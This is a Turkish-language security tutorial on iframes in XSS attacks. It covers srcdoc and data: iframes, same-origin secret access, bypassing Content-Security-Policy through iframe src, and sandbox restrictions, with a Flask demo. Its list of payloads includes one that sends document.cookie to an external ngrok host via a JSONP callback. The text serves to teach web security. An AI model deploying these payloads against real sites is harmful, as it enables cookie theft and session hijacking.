XSS'te İframeler

Bir iframeli sayfanın içeriğini belirtmenin 3 yolu vardır:

• src ile bir URL belirterek (URL çapraz kökenli veya aynı kökenli olabilir)

• data: protokolünü kullanarak içeriği belirterek src ile

• İçeriği belirterek srcdoc kullanarak

<html>
<script>
var secret = "31337s3cr37t";
</script>

<iframe id="if1" src="http://127.0.1.1:8000/child.html"></iframe>
<iframe id="if2" src="child.html"></iframe>
<iframe id="if3" srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>

<script>
function access_children_vars(){
alert(if1.secret);
alert(if2.secret);
alert(if3.secret);
alert(if4.secret);
}
setTimeout(access_children_vars, 3000);
</script>
</html>

<!-- content of child.html -->
<script>
var secret="child secret";
alert(parent.secret)
</script>

Eğer önceki html'e bir http sunucusu üzerinden erişirseniz (örneğin python3 -m http.server gibi) tüm scriptlerin yürütüldüğünü fark edeceksiniz (çünkü engelleyen bir CSP yok). Ana sayfa, herhangi bir iframe içindeki secret değişkenine erişemeyecek ve yalnızca aynı site olarak kabul edilen if2 ve if3 iframeleri orijinal penceredeki secret değişkenine erişebilecek. if4'ün null kökene sahip olduğuna dikkat edin.

CSP ile İframeler

script-src'nin self değeri, JS kodunun data: protokolünü veya srcdoc özniteliğini kullanarak yürütülmesine izin vermeyecektir. Ancak, CSP'nin none değeri bile, src özniteliğine URL (tam veya sadece yol) ekleyen iframelerin yürütülmesine izin verecektir. Bu nedenle, bir sayfanın CSP'sini aşmak mümkündür:

<html>
<head>
<meta http-equiv="Content-Security-Policy" content="script-src 'sha256-iF/bMbiFXal+AAl9tF8N6+KagNWdMlnhLqWkjAocLsk='">
</head>
<script>
var secret = "31337s3cr37t";
</script>
<iframe id="if1" src="child.html"></iframe>
<iframe id="if2" src="http://127.0.1.1:8000/child.html"></iframe>
<iframe id="if3" srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
</html>

Not alın ki önceki CSP yalnızca iç içe betiğin yürütülmesine izin verir. Ancak, yalnızca if1 ve if2 betikleri yürütülecek ancak yalnızca if1 üst ebeveyin sırrına erişebilecek.

Bu nedenle, bir JS dosyasını sunucuya yükleyebilir ve iframe aracılığıyla yükleyebilirseniz, script-src 'none' ile bile bir CSP'yi atlayabilirsiniz. Bu, aynı site JSONP ucu kullanılarak da potansiyel olarak yapılabilir.

Bunu script-src 'none' ile bile bir çerezin çalındığı aşağıdaki senaryo ile test edebilirsiniz. Uygulamayı çalıştırın ve tarayıcınızdan erişin:

import flask
from flask import Flask
app = Flask(__name__)

@app.route("/")
def index():
resp = flask.Response('<html><iframe id="if1" src="cookie_s.html"></iframe></html>')
resp.headers['Content-Security-Policy'] = "script-src 'self'"
resp.headers['Set-Cookie'] = 'secret=THISISMYSECRET'
return resp

@app.route("/cookie_s.html")
def cookie_s():
return "<script>alert(document.cookie)</script>"

if __name__ == "__main__":
app.run()

Vahşi Doğada Bulunan Diğer Yükler

<!-- This one requires the data: scheme to be allowed -->
<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
<!-- This one injects JS in a jsonp endppoint -->
<iframe srcdoc='<script src="/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
<!-- sometimes it can be achieved using defer& async attributes of script within iframe (most of the time in new browser due to SOP it fails but who knows when you are lucky?)-->
<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>

Iframe kum havuzu

Bir iframe içindeki içerik, sandbox özelliğinin kullanımıyla ek kısıtlamalara tabi tutulabilir. Varsayılan olarak, bu özellik uygulanmaz, yani herhangi bir kısıtlama bulunmaz.

Kullanıldığında, sandbox özelliği birkaç kısıtlama getirir:

• İçerik, benzersiz bir kaynaktan geldiği gibi işlenir.

• Formların gönderilme girişimleri engellenir.

• Komut dosyalarının yürütülmesi yasaklanmıştır.

• Belirli API'lere erişim devre dışı bırakılmıştır.

• Bağlantıların diğer gezinme bağlamlarıyla etkileşimini engeller.

• <embed>, <object>, <applet> veya benzer etiketler aracılığıyla eklentilerin kullanımı yasaktır.

• İçeriğin üst düzey gezinme bağlamının içeriğin kendisi tarafından engellenmesi.

• Video oynatma veya form kontrollerinin otomatik odaklanması gibi otomatik olarak tetiklenen özellikler engellenir.

Özniteliğin değeri, tüm yukarıdaki kısıtlamaların uygulanması için boş bırakılabilir (sandbox=""). Aksi takdirde, belirli kısıtlamalardan iframe'ı muaf tutan belirli değerlerin boşlukla ayrılmış bir listesi olarak ayarlanabilir.

<iframe src="demo_iframe_sandbox.htm" sandbox></iframe>

Iframe'lerde SOP

Aşağıdaki sayfalara bakın: